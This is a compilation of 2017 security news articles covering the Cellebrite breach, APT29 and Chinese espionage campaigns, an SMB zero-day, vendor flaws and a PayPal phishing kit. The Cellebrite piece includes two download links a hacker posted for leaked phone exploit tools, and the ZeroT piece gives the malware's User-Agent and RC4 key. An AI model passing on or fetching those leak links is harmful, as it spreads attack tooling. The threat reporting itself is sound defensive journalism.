The hacker that breached the systems of the mobile forensics company Cellebrite leaked online some tools and announced further releases.
In January the Israeli mobile phone data extraction company Cellebrite was hacked, the company went in the headlines in the dispute between Apple and the FBI in the case of the San Bernardino shooter’s iPhone.
The main product of the company is the Universal Forensic Extraction Device (UFED), an equipment that can rip data (i.e. SMS messages, emails, call logs) from a huge number of different models of mobile phones.
Cellebrite
The experts are still investigating the case, meantime Cellebrite has confirmed the security breach. The company confirmed that someone accessed its systems stealing roughly 900 Gb of data, a huge quantity of data mainly composed of log data from its end-user licensing system my.Cellebrite and other sensitive data. The archive includes also 350 Gb of offline world map backups, but attackers did not access “full passwords” or payment information. have not been obtained – although it has admitted that some password hashes have been stolen.
“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” reads an announcement issued by the company.There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”
According to the company, hackers accessed just some password hashes and information on closed technical support inquiries.
The hacker decided anyway to publish not only information contained in the archive, but also exploits for Android, iOS, and BlackBerry mobile devices.
According to Motherboard, the forensics expert Jonathan Zdziarski who analyzed the dump confiremed thay many of the exploits for iOS devices are widely available tools, for this reason he avoids to call them “exploits.”
The hacker promptly responded to Zdziarski via Pastebin, he confirmed that Apple tools are widely available, but also added that BlackBerry files are not publicly available.
“The more discerning eye will notice that some of the Apple exploits bear a remarkable resemblance to those available to any teenager interested in the jailbreaking scene perhaps not all those tax dollars have been wasted, the Blackberry epr is still worth a look at.” states the hacker.
“The files referenced here are part of the distribution package of our application and are available to our customers. They do not include any source code.” wrote a spokesperson for Cellebrite in an email sent to Motherboard.
“He added that the company monitors new research from academia and the information security community, including “newly published forensic methods, research tools and publicly documented issues, including “jailbreaks,” which enable platform research.”
The hacker plans to release a small sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.
“Analysis of the compression and obfuscation employed by Cellebrite on products supplied to British MOD juxtaposed with the protection free versions supplied to SOCOM and others is also included within.” added the hacker.
The download links are:
https://mega.nz/#!sZUkSbDT!l740KTf5TG-TgjN-YNZcejSOfhUn43jZ8jR3Lw_w7dY
https://mega.nz/#!0d9zBQLI!DdKhZDXoMEnO6RpZDHWMGVV7nBXXZ98cPzjzVqLsVuw
Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs APT
The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back, the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, intelligence and other institutions.
“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.
The Norway was informed of ongoing attacks by an allied state, it is currently investigating the case, but it is still unclear which was the motivation behind the attack.
“It’s difficult to know what the goal” he added.
Despite legislative elections are scheduled for September 2017, experts believe that the attacks are not linked to the vote.
The APT 29 group is likely interested in the Norway NATO membership, especially in the wake of the Ukraine crisis.
Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.
The Norwegian official confirmed that the APT 29 group has links to the Russian authorities, the hackers area also accused to have interfered with the recent US Presidential Election.
APT 29 group Norway
At the time I was writing it is not clear if the hackers have exfiltrated sensitive information, according to the Verdens Gang (VG), the PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”
According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.
Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.
Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.
Windows SMB 0-Day Exposes Systems to Attacks
3.2.2017 securityweek Vulnerebility
A 0-day memory corruption vulnerability discovered in the SMB (Server Message Block) protocol can be exploited to cause denial of service or potentially execute arbitrary code on a vulnerable system.
According to the United States Computer Emergency Readiness Team (US-CERT), which has already published an advisory on the matter, the bug resides in the manner in which Windows handles SMB traffic and can be exploited by remote, unauthenticated attackers for nefarious purposes.
SMB (one of its versions was also known as Common Internet File System, or CIFS), operates as an application-layer network protocol designed to allow machines to access files, printers, serial ports, and miscellaneous communications between nodes on a local network, while also offering an authenticated inter-process communication mechanism.
According to US-CERT, the Windows platform fails to properly handle a server response containing too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure. Thus, when a vulnerable Windows client system connects to a malicious SMB server, it can crash (Black Screen of Death or BSOD) in mrxsmb20.sys.
The advisory also notes that the vulnerability has been already confirmed as being exploitable in denial of service attacks, but that it’s not clear whether it could be exploited further. By exploiting the vulnerability, an attacker might also be able to execute arbitrary code with Windows kernel privileges, US-CERT warns.
“We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems. Note that there are a number of techniques that can be used to trigger a Windows system to connect to an SMB share. Some may require little to no user interaction,” the advisory also notes.
With exploit code for the vulnerability already publicly available but no practical solution to this problem known at this time, suggested workarounds include blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has a base Common Vulnerability Scoring System (CVSS) score of 10.0. It has been publicly reported by @PythonResponder, who says that Windows Server 2012 and 2016 versions are also affected. Proof-of-concept code has been published on GitHub.
Chinese Cyberspies Target Russia With New Malware
3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.
In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.
Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.
Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.
The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.
The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.
Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.
Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.
Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.
However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.
Norway Accuses Russia of Cyberattack
3.2.2017 securityweek Cyber
Oslo - Norway's foreign ministry, army and other institutions were targeted in a recent cyberattack by a group suspected of ties to Russian authorities, Norwegian intelligence -- which was among the targets -- said Friday.
Known as APT 29, the group singled out by Oslo has already been accused of hacking interference in the US election last year.
"Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails," Arne Christian Haugstoyl, an official with Norway's intelligence service PST, told television channel TV2.
"It's difficult to know what the goal" of the operation was, he said, adding that Norway was alerted to the attack by an allied country.
He described APT 29 as a group "with links to the Russian authorities".
PST spokesman Martin Bernsen, quoted by daily Verdens Gang (VG), said there was "no reason to believe that classified information had been obtained in connection with the attack."
In addition to the foreign ministry, the army and PST itself, the attack -- the date of which was not disclosed -- also targeted the Norwegian radiation protection agency, a school and the parliamentary group of the Labour party, the traditionally dominant political party in Norway but which is currently in opposition.
Legislative elections are scheduled for September 11, though no link has been made to the vote.
Norway, a NATO member, and its neighbor Russia normally enjoy good relations but ties have grown more tense in the wake of the Ukraine crisis.
The Scandinavian country on Wednesday summoned the Russian ambassador to lodge a protest after Moscow refused visas to two senior lawmakers in a move Oslo denounced as "unjustifiable".
Russia said the visa refusal was a reaction to Norway's participation in EU economic sanctions against it over the Ukraine crisis.
Moscow was also angered by the recent deployment of some 300 US soldiers on Norwegian soil.
Several Flaws Patched in Honeywell Controllers
3.2.2017 securityweek Vulnerebility
Honeywell has released updates for its XL Web II controllers to address several critical and high severity vulnerabilities that can be exploited remotely from the Internet.
XL Web II or Excel Web II controllers, which are also sold under the Falcon brand, are web-based SCADA (supervisory control and data acquisition) systems designed for building management applications.
Security researcher Maxim Rupp discovered last summer that the product is affected by flaws that allow a remote attacker to obtain sensitive information and use the affected system as an entry point into the targeted organization’s network.
Rupp told SecurityWeek that, using the Shodan search engine, he has identified more than 600 vulnerable devices accessible from the Internet.Vulnerabilities in Honeywell Excel Web controllers
ICS-CERT has published an advisory describing the vulnerabilities, but the researcher says there are some inaccuracies. According to the expert’s own report, the flaws affect XL20xxBxx controllers running firmware version XLWeb2_vUBC_3-04-04-07 and prior, and CLEA20xxBxx devices running firmware version Eagle_vUBC_3-04-04-07 and prior.
The most serious of the flaws, rated critical based on their CVSS score, are related to exposed credentials. The expert discovered that the application stores passwords in easily accessible JavaScript files for client-side verification (CVE-2017-5140). These passwords are stored in clear text (CVE-2017-5139) and an attacker can access them without authentication.
2017 Singapore ICS Cyber Security Conference Call for Papers is Open!
Another vulnerability rated critical is an improper privilege management issue (CVE-2017-5142) that allows a user with limited privileges to access certain functions simply by navigating to a specific URL. These functions are normally accessible only to users with higher privileges.
Rupp has also discovered a high severity path traversal flaw (CVE-2017-5143) that allows an unauthenticated attacker to gain access to files that can contain sensitive information.
ICS-CERT’s advisory also mentions a medium severity session fixation flaw that could allow an attacker to gain access to a targeted user’s account (CVE-2017-5141). Rupp said this vulnerability was not included in his report and that it likely refers to a combination of weaknesses.
According to the researcher and ICS-CERT, Honeywell addressed the vulnerabilities with the release of version 3.04.05.05. Users can obtain the patches by contacting their vendor. There is no evidence that the flaws have been exploited in the wild.
Chinese state-sponsored hackers targets Russia and Belarus with ZeroT and PlugX
3.2.2017 securityaffeirs Hacking
According to the firm ProofPoint, Chinese state-sponsored actors continues to spy on military and aerospace organizations in Russia and Belarus.
Chinese state-sponsored actors are spying on military and aerospace interests in Russia and Belarus. According to the experts from Proofpoint, the attacks began in the summer of 2016, the Chinese hackers launched a spear-phishing campaign leveraging a new downloader known as ZeroT in order to deliver the PlugX RAT.
Researchers explained that in the past the same threat actors conducted spear-phishing campaigns using Microsoft Word document attachments that were able to trigger the CVE-2012-0158, or containing malicious URLs pointing to .rar-compressed executable nasties.
The Proofpoint analysis revealed that Russian firms are among the targets of the group.
The Chinese hackers switched tactics for spying on Russian jet makers once completed the development of the ZeroT malware.
“Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.” reads the analysis published by ProofPoint. “Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.”
This analysis of ZeroT malware revealed it used obfuscation techniques to avoid the detection, a significant number of samples analyzed by the expert contained the file named Go.exe which allows the Windows UAC bypass.
ZeroT communicates with the C&C server over HTTP, it also uses a fake User-Agent in all the requests.
“Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)”, with “Tzcdrnt” possibly being a typo of “Trident.” In all the samples we observed, ZeroT first beacons to index.php expecting an RC4-encrypted response using a static key: “(*^GF(9042&*”. continues the analysis
Chinese nation-state hackers tied the PLA already targeted in the past US and European firms in the aerospace industry.
Chinese hackers were behind the cyber espionage campaign on the Lockheed Martin F-35 Joint Strike Fighter that caused the arrest of a Chinese national.
On July 2016, US sentenced the Chinese hacker involved in the theft of industrial secrets on the F-22 and F-35 fighter jets, C-17 transport aircraft and F-35 aircraft.
Military experts know very well that many Russian and US jets were almost identical to the once developed by China.
Authentication Bypass Vulnerability found in Cisco Prime Home product
3.2.2017 securityaffeirs Vulnerebility
The experts at Cisco have discovered a critical authentication bypass vulnerability in the Cisco Prime Home during an internal security testing.
Cisco has released a security update for CISCO Prime Home remote management and provisioning solution to fix a flaw that could be exploited to authentication bypass. The experts at Cisco have discovered the critical authentication bypass flaw during an internal security testing.
The Cisco Prime Home is a product used by Internet service providers (ISPs) to view customers’ home networks, it allows to make configuration changes and software upgrades, and could be used for the remote diagnostics.
The flaw, tracked as CVE-2017-3791, resides in the web-based user interface of the Cisco Prime Home, it can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.
“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication.” states the Cisco advisory. “An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges.”
The flaw affects Cisco Prime Home versions 6.3, 6.4 and 6.5, versions 5.2 and earlier are not impacted. Cisco fixed the issue with the version 6.5.0.1, It is important to highlight the absence of a workaround.
The experts at the Cisco Product Security Incident Response Team (PSIRT) are not aware of any public announcements or exploitation of the flaw.
Hacker Leaks Tools Stolen From Cellebrite
3.2.2017 securityweek Hacking
The hacker who recently breached the systems of Israel-based mobile forensics company Cellebrite leaked some tools on Thursday and promised to dump more of the stolen data in the future.
While its investigation is still ongoing, Cellebrite has confirmed that someone had gained unauthorized access to its systems, stealing roughly 900 Gb of data.
According to the company, most of the data represents logs from its end-user licensing system my.Cellebrite and other unimportant files, such as 350 Gb of offline world map backups.
The compromised data does include customer contact information from a my.Cellebrite backup, but the company says “full passwords” or payment information have not been obtained – although it has admitted that some password hashes have been stolen.
Cellebrite also admitted that the hacker gained access to information on technical support inquiries, but claims the exposed files are not related to open support cases.
“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” the company stated. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”
In an effort to prove that he had stolen much more than just basic contact information, the hacker leaked what he claims to be “exploits” for iOS, Android and BlackBerry devices.
The download links no longer work, but Vice’s Motherboard learned from forensics expert Jonathan Zdziarski that many of the leaked iOS-related files appear to be widely available tools from the jailbreaking community. Zdziarski said he would not call the leaked files “exploits.”
In a message posted on Pastebin, the hacker admitted that the Apple tools are widely available, but claimed that the BlackBerry tools are “worth a look at.”
Cellebrite told Motherboard that the tools leaked this week are part of the distribution package of its application, but reiterated that source code was not compromised.
The hacker said he also plans on leaking what he describes as “a sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.”
Chinese Cyberspies Target Russia With New Malware
3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.
In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.
Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.
Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.
The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.
The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.
Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.
Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.
Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.
However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.
SQL Slammer Worm Crawls Back
3.2.2017 securityweek Virus
SQL Slammer, a tiny worm that managed to wreak havoc across the Internet on January 25, 2003, appears to have recommenced activity, Check Point security researchers warn.
The computer worm was first spotted on the day it caused a denial of service condition on tens of thousands of servers worldwide by overloading Internet objects such as servers and routers with a massive number of network packets. Within 10 minutes of its first emergence, SQL Slammer had managed to infect most of its roughly 75,000 victims.
SQL Slammer was based on proof-of-concept code demonstrated at the Black Hat Briefings by David Litchfield, who discovered a buffer overflow bug in Microsoft's flagship SQL Server and Desktop Engine database products. Although the vulnerability had been patched by Microsoft six months before the worm hit, many installations weren’t patched, and the malicious code could easily propagate.
Also referred to as the Sapphire Worm and Helkern, SQL Slammer is only 376 bytes in size, thus fitting inside a single packet, a feature that allowed it enjoy rapid propagation when it hit. The worm was sending a formatted request to UDP port 1434 and was causing infected routers to start sending the malicious code to random IP addresses, which resulted in a denial of service condition on targets.
Although it remained dormant for over a decade, SQL Slammer appears to have restarted activity, Check Point security researchers warn. According to data collected by Check Point, there was a massive increase in the number of attack attempts between November 28 and December 4, 2016. SQL Slammer was one of the top malware detected in the timeframe.
(Image Credit: Check Point)
The number of destination countries of the observed attack attempts was of 172 countries, with 26% of the attacks targeting networks in the United States. According to Check Point, this data shows that the newly recorded SQL Slammer activity wasn’t a targeted attack, but rather a larger wave of attacks.
The security firm also notes that the largest number of attack attempts came from IP addresses located in China, Vietnam, Mexico, and Ukraine.
“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” Check Point concludes.
PayPal Phishing Attack Immediately Verifies Credentials
3.2.2017 securityweek Phishing
A newly observed phishing campaign targeting PayPal users employs checks to immediately verify whether the entered login credentials are legitimate or not, Proofpoint reveals.
Using email as the distribution method, attackers lured users to a well-crafted phishing page that appeared to be a legitimate PayPal login page, but was actually the first step in an elaborate scheme meant to trick users into revealing their banking and personal information. (The attack is different from a separate sophisticated phishing campaign targeting PayPal users detailed earlier this week.)
The phishing page, researchers say, returns a “vaguely worded error message” if the wrong credentials are entered, something that doesn’t usually happen with phishing landing pages, as they tend to accept any credentials that users enter. The newly observed page, however, verifies the entered credentials with PayPal before moving forth with the scheme.
To perform the check, the crooks were using a decommissioned service in PayPal, meant to allow one to purchase a gift card from a user. “If the queried email account does not exist, the login supplied to the phishing landing page is discarded, helping to ensure that the phisher gets a higher percentage of valid credentials. The code does not check the password, only that the email account exists on PayPal,” Proofpoint researchers note.
Usually, scammers verify the stolen credentials after they managed to acquire a larger number of potential logins, but the new approach eliminates the need to perform the validation at a later date. On top of that, researchers say, this specific approach can fool automated analysis tools.
Once a valid PayPal email address is used, the victim is presented with a reassuring welcome page, followed by a phishing page on which users are required to confirm the credit card information they have associated with their PayPal account. Because the phishing kit comes with support for multiple languages, it can appear legitimate to users in many locations.
The phishing kit was also designed to check the credit card number that the victim supplies, making sure it passes the Luhn algorithm, as well as to perform a lookup against the card number to retrieve additional information. After validating the credit card, the kit asks the victim to enter security information about their card.
Users are also asked to link their bank accounts to their PayPal account, and are offered a number of well-known retail banks to choose from. Stolen bank branding gives the phishing page a legitimate look. Next, the user is asked to enter login credentials for their bank, claiming that the information is not saved, which is, of course, fraud.
“The user is then prompted for routing information for the bank account. Finally, the phishing kit prompts the user for identity information such as a driver's license number or other identifying document that can be uploaded directly to the phishing kit. If the victim clicks the ‘Don't have your ID now?’ button, they simply skip this screen,” Proofpoint said.
After attempting to gather all of the aforementioned personal and financial information from the victims, the phishing kit then redirects them to the legitimate PayPal website. According to Proofpoint, in addition to using inventive phishing pages, the scheme uses an administrative backend similar to what remote access Trojans (RATs) usually employ.
Through this panel, attackers can view visitor information, the option to access stolen credentials, and a simple interface for the administrator to modify settings. There is even the option to enable a “selfie page” where Flash is used to interact with the victim's webcam, most probably to allow the phisher to snap a photo of the victim for later use. The admin panel even features a page for Trojans, but the feature appears to be under development.
“As attackers continue to turn away from the use of exploits and other means of compromising victim PCs and stealing information via malware, they are developing increasingly sophisticated means of collecting credentials and other data directly through phishing schemes. The use of phishing kits like the one detailed here provides threat actors with ready access to turnkey templates and administrative backends that make harvesting data from unsuspecting victims all too easy,” Proofpoint says.
The phishing kit also illustrates the advanced state of “crimeware as a service” and how straightforward conducting phishing scams can be. The existence of an admin panel with the aforementioned options is quite rare among credential phishing kits at the moment, but similar panels were previously associated with APT activities. However, this type of admin panel is expected to become more common and, understandably, popular with phishing actors, Proofpoint concludes.
Radio Stations Hacked to Play "F**k Donald Trump" on Repeat Across the Country
3.2.2017 thehackernews Hacking
It’s just two weeks into the Trump presidency, but his decisions have caused utter chaos around the country.
One such order signed by the president was banning both refugees and visa holders from seven Muslim-majority countries (Iraq, Iran, Libya, Yemen, Somalia, Syria, and Sudan) from entering the United States, resulting in unexpectedly arrest of some travelers at airports.
Now, it seems like some anti-Trump protesters have publically declared their fight against the president by exploiting a known flaw in low power FM (LPFM) radio transmitters to play a song the radio stations didn't intend to broadcast.
Radio stations in South Carolina, Indiana, Texas, Tennessee and Kentucky, were hacked recently to broadcast the Bompton-based rapper YG and Nipsey Hussle's anti-Trump song "Fuck Donald Trump," which was already a radio hit in some parts of the country last year, several sources report.
The song was repeatedly played on Monday night, according to the RadioInsight, and the news of the incident began emerging shortly after Trump's inauguration on January 20, eight days before hackers hacked 70 percent of the police CCTV cameras in Washington DC.
Hackers gained access to the radio stations by exploiting known vulnerabilities in Barix Exstreamer devices which can decode audio file formats and send them along for LPFM transmission.
Over a dozen radio stations experienced the hack in recent weeks, though some of them shut down their airwaves as quickly as possible in an attempt to avoid playing the inflammatory "FDT (Fuck Donald Trump)" song on loop.
The hackers or group of hackers behind the cyber attack is still unknown. The affected stations so far include:
105.9 WFBS-LP Salem, S.C.
Radio 810 WMGC/96.7 W244CW Murfreesboro TN
101.9 Pirate Seattle
100.9 WCHQ-LP Louisville
100.5 KCGF-LP San Angelo TX
However, there are unconfirmed reports from radio stations in California, Indiana, and Washington State that are believed to be affected as well.
Has any of the radio stations you listen to been hit by the hackers? Let us know in the comments!
Critical McAfee ePO Flaw Ideal For Reconnaissance
3.2.2017 securityweek Vulnerebility
Intel Security has fixed a critical vulnerability in its McAfee ePolicy Orchestrator (ePO) centralized security management product. Researchers warn that the flaw is ideal for profiling the users and infrastructure of an organization.
The flaw, tracked as CVE-2016-8027 and assigned a CVSS score of 10.0, is a blind SQL injection discovered by a member of the Cisco Talos Vulnerability Development Team. The security hole can be triggered using specially crafted HTTP POST requests and it allows an unauthenticated attacker to obtain information from the application database.
McAfee ePO allows organizations to manage their security policies from a central console. The solution requires the deployment of agents on each endpoint, and these agents communicate over a proprietary protocol known as SPIPE.
The vulnerable component is in the application server and it can be reached directly via the administration console or over SPIPE. Researchers warned that exploitation of the flaw can also allow attackers to impersonate an agent, which can reveal information related to that agent.
“Vulnerabilities like this can allow deep insight into the organisation without an attacker requiring any privileged access to centralised platforms such as Active Directory, with this access an attacker can profile users and the infrastructure passively,” Talos researchers said in a blog post.
The security hole affects McAfee ePO version 5.1.3 and earlier, and 5.3.2 and earlier. Intel Security has released hotfixes to address the vulnerability. While the vendor says there are no mitigations or workarounds, Talos believes attacks can be prevented by limiting access to port 8443.
Cisco has published technical details on the vulnerability and Intel Security has released an advisory with information on affected versions and patches.
It’s not uncommon for researchers to find vulnerabilities in enterprise security products. Serious flaws have also been identified in solutions from Symantec, FireEye, Kaspersky, Sophos and several other vendors.
Russia-Linked "Turla" Group Uses New JavaScript Malware
3.2.2017 securityweek Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.
The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.
In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.
The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.
The final KopiLuwak payload is hidden under several JavaScript layers. Once it becomes persistent by creating a registry key, the malware executes a series of commands in an effort to collect information about the infected system. The harvested data is stored in a temporary file that is deleted after it’s encrypted and stored in memory.
KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose address has been hardcoded into the malware.
The C&C can instruct the malware to sleep, exit and terminate C&C communications until the next reboot, uninstall itself, and run arbitrary commands on the infected system using Wscript.shell.run().
One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.
For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.
“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”
Security Intelligence Automation Startup LogicHub Emerges from Stealth
3.2.2017 securityweek Security
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.
LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.
"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."
But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.
"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."
This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.
It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."
In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."
"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."
In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."
Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates that capture of analyst methods, so that different analytical method from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."
This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.
Identity Fraud Hit 15.4 Million U.S. Victims in 2016: Report
3.2.2017 securityweek Crime
In 2016, 15.4 million U.S. consumers became identity fraud victims, a 16% increase over the previous year, according to a recent Javelin Strategy & Research study.
Despite increased efforts from the industry to tackle identity fraud, cybercriminals managed to net two million more victims in the last year, with the incurring damages going up by $1 billion to reach $16 billion, Javelin Strategy & Research’s 2017 Identity Fraud Study shows. The suffered losses are in line with those reported two years ago.
Payment card fraud experienced a resurgence in 2016, with card-not-present (CNP) registering an increase of 40%. As the report explains, “the increase in EMV cards and terminals was a catalyst for driving fraudsters to shift to fraudulently opening new accounts.” The research also claims that, although crooks are becoming better at evading detection, consumers with an online presence are detecting fraud quicker.
Fraud trends, however, are worrying, especially with 6.15% of consumers becoming victims of identity fraud in 2016. Compared to the previous year, almost 2 million more people fell victim, mainly fueled by a spike in existing card fraud, the report shows.
